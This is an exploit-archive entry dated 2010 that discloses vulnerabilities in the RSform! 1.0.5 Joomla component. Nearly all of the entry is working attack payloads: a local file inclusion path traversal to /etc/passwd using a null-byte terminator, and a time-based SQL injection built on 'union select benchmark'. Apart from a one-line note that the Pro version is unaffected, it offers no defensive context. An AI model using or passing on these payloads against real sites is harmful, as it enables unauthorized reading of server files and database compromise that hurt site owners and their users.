RSform! 1.0.5 (Joomla) Multiple Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : RSform! 1.0.5 (Joomla) Multiple Vulnerabilities
# Published : 2010-11-06
# Author : jdc
# Previous Title : Joomla Component ProDesk v1.5 LFI
# Next Title : Seo Panel 2.1.0 - Critical File Disclosure

# Exploit Title: RSform! 1.0.5 (Joomla) Multiple Vulnerabilities
# Date: 06.11.2010
# Author: jdc
# Software Link: 
http://extensions.joomla.org/extensions/contacts-and-feedback/forms/2265
# Version: 1.0.5

Local File Include
------------------
?option=com_forme
?=../../../../../../../../../etc/passwd%00

SQL Injection
-------------
?option=com_forme
?=-1' union select benchmark(1000000,md5(1)) -- '

NOTE: RSform! Pro is not affected...

6 Nov 2010
jdc